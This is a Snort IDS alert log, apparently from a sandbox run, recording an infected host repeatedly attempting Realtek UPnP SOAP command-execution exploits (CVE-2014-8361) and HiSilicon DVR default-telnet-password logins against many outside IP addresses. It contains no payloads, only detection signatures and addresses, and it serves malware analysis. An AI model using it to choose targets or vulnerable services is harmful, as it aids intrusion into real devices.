                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58256 -> 45.195.155.84:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58136 -> 45.122.134.220:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58136 -> 45.122.134.220:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34574 -> 185.215.47.22:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53304 -> 185.215.47.246:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53304 -> 185.215.47.246:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53306 -> 185.215.47.246:52869
                Source: TrafficSnort IDS: 492 INFO TELNET login failed 201.235.160.26:23 -> 192.168.2.23:47716
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59996 -> 45.33.243.126:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59996 -> 45.33.243.126:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39854 -> 185.140.84.217:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39854 -> 185.140.84.217:52869
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 37.84.226.148:23 -> 192.168.2.23:56244
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 37.84.226.148:23 -> 192.168.2.23:56244
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39868 -> 185.140.84.217:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50156 -> 45.114.93.222:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50156 -> 45.114.93.222:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50160 -> 45.114.93.222:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51290 -> 45.120.185.198:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51290 -> 45.120.185.198:52869
                Source: TrafficSnort IDS: 716 INFO TELNET access 87.241.247.177:23 -> 192.168.2.23:57592
                Source: TrafficSnort IDS: 492 INFO TELNET login failed 201.235.160.26:23 -> 192.168.2.23:47796
                Source: TrafficSnort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:40724 -> 108.18.240.94:23
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59378 -> 45.158.22.221:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59378 -> 45.158.22.221:52869
                Source: TrafficSnort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:60410 -> 116.97.240.187:23
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35548 -> 45.42.94.43:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35548 -> 45.42.94.43:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53920 -> 185.131.77.199:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53920 -> 185.131.77.199:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53924 -> 185.131.77.199:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42692 -> 45.84.90.12:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42692 -> 45.84.90.12:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42698 -> 45.84.90.12:52869
                Source: TrafficSnort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:38066 -> 209.204.44.162:23
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50270 -> 45.121.81.27:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50270 -> 45.121.81.27:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38886 -> 45.122.133.194:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38886 -> 45.122.133.194:52869
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 209.204.44.162:23 -> 192.168.2.23:38066
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 209.204.44.162:23 -> 192.168.2.23:38066
                Source: TrafficSnort IDS: 492 INFO TELNET login failed 201.235.160.26:23 -> 192.168.2.23:47830
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33818 -> 91.78.75.231:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33818 -> 91.78.75.231:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33826 -> 91.78.75.231:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:32844 -> 45.127.161.49:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:32844 -> 45.127.161.49:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43692 -> 45.120.184.55:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43692 -> 45.120.184.55:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38098 -> 45.153.8.249:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38098 -> 45.153.8.249:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35166 -> 45.91.83.187:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35166 -> 45.91.83.187:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43708 -> 45.120.184.55:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35182 -> 91.200.123.139:52869
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 209.204.44.162:23 -> 192.168.2.23:38102
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 209.204.44.162:23 -> 192.168.2.23:38102
                Source: TrafficSnort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 91.128.210.143: -> 192.168.2.23:
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60582 -> 91.76.202.247:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60582 -> 91.76.202.247:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60588 -> 91.76.202.247:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33274 -> 91.76.255.109:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33274 -> 91.76.255.109:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56410 -> 45.43.229.248:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56410 -> 45.43.229.248:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33280 -> 91.76.255.109:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51758 -> 91.78.136.58:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51758 -> 91.78.136.58:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51762 -> 91.78.136.58:52869
                Source: TrafficSnort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:59484 -> 212.77.80.105:23
                Source: TrafficSnort IDS: 492 INFO TELNET login failed 201.235.160.26:23 -> 192.168.2.23:47962
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43294 -> 185.94.250.10:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43294 -> 185.94.250.10:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36678 -> 91.76.239.162:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36678 -> 91.76.239.162:52869
                Source: TrafficSnort IDS: 560 POLICY VNC server response 185.94.250.10:52869 -> 192.168.2.23:43294
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43404 -> 185.94.250.10:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36684 -> 91.76.239.162:52869
                Source: TrafficSnort IDS: 560 POLICY VNC server response 185.94.250.10:52869 -> 192.168.2.23:43404
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56288 -> 45.42.93.247:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56288 -> 45.42.93.247:52869
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 204.117.53.70:23 -> 192.168.2.23:57786
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 204.117.53.70:23 -> 192.168.2.23:57786
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53116 -> 185.241.253.221:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53116 -> 185.241.253.221:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53156 -> 185.241.253.221:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56260 -> 45.121.81.235:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56260 -> 45.121.81.235:52869
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 37.84.226.148:23 -> 192.168.2.23:56546
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 37.84.226.148:23 -> 192.168.2.23:56546
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39678 -> 45.115.237.56:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39678 -> 45.115.237.56:52869
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 204.117.53.70:23 -> 192.168.2.23:57866
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 204.117.53.70:23 -> 192.168.2.23:57866
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47016 -> 185.160.192.66:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47016 -> 185.160.192.66:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47024 -> 185.160.192.66:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56306 -> 45.43.239.146:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56306 -> 45.43.239.146:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59052 -> 45.127.160.194:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59052 -> 45.127.160.194:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56646 -> 45.142.152.217:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56646 -> 45.142.152.217:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43726 -> 45.138.70.34:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43726 -> 45.138.70.34:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53570 -> 91.77.248.186:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53570 -> 91.77.248.186:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43738 -> 45.138.70.34:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53576 -> 91.77.248.186:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57116 -> 45.126.230.115:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57116 -> 45.126.230.115:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51014 -> 45.41.81.89:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51014 -> 45.41.81.89:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33876 -> 45.42.83.148:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33876 -> 45.42.83.148:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39398 -> 45.33.247.105:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39398 -> 45.33.247.105:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48800 -> 45.33.243.218:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48800 -> 45.33.243.218:52869
                Source: TrafficSnort IDS: 492 INFO TELNET login failed 201.235.160.26:23 -> 192.168.2.23:48082
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 204.117.53.70:23 -> 192.168.2.23:57922
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 204.117.53.70:23 -> 192.168.2.23:57922
                Source: TrafficSnort IDS: 716 INFO TELNET access 65.242.93.105:23 -> 192.168.2.23:38784
                Source: TrafficSnort IDS: 492 INFO TELNET login failed 200.178.94.209:23 -> 192.168.2.23:51854
                Source: TrafficSnort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:46400 -> 220.133.104.184:23
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42420 -> 185.131.77.70:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42420 -> 185.131.77.70:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42428 -> 185.131.77.70:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47142 -> 45.41.82.107:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47142 -> 45.41.82.107:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33226 -> 45.126.229.137:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33226 -> 45.126.229.137:52869
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 204.117.53.70:23 -> 192.168.2.23:57990
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 204.117.53.70:23 -> 192.168.2.23:57990
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50888 -> 45.126.231.173:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50888 -> 45.126.231.173:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42864 -> 45.42.83.86:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42864 -> 45.42.83.86:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38282 -> 185.54.229.57:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38282 -> 185.54.229.57:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38292 -> 185.54.229.57:52869
                Source: TrafficSnort IDS: 492 INFO TELNET login failed 201.235.160.26:23 -> 192.168.2.23:48264
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52200 -> 91.78.107.80:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52200 -> 91.78.107.80:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52208 -> 91.78.107.80:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53558 -> 185.131.78.86:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53558 -> 185.131.78.86:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58636 -> 91.78.14.249:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58636 -> 91.78.14.249:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53566 -> 185.131.78.86:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58642 -> 91.78.14.249:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58278 -> 45.123.197.166:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58278 -> 45.123.197.166:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36560 -> 45.120.108.90:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36560 -> 45.120.108.90:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38118 -> 45.81.128.120:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38118 -> 45.81.128.120:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36606 -> 45.120.108.90:52869
                Source: TrafficSnort IDS: 716 INFO TELNET access 95.17.174.206:23 -> 192.168.2.23:41006
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 204.117.53.70:23 -> 192.168.2.23:58062
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 204.117.53.70:23 -> 192.168.2.23:58062
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59160 -> 185.65.161.138:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59160 -> 185.65.161.138:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59164 -> 185.65.161.138:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42580 -> 45.41.89.213:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42580 -> 45.41.89.213:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42366 -> 45.116.212.26:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42366 -> 45.116.212.26:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42416 -> 45.116.212.26:52869
                Source: TrafficSnort IDS: 492 INFO TELNET login failed 201.235.160.26:23 -> 192.168.2.23:48388
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51388 -> 45.121.81.174:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51388 -> 45.121.81.174:52869
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 204.117.53.70:23 -> 192.168.2.23:58158
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 204.117.53.70:23 -> 192.168.2.23:58158
                Source: TrafficSnort IDS: 716 INFO TELNET access 182.52.108.215:23 -> 192.168.2.23:45830
                Source: TrafficSnort IDS: 716 INFO TELNET access 111.118.118.151:23 -> 192.168.2.23:60176
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37006 -> 45.126.229.221:52869
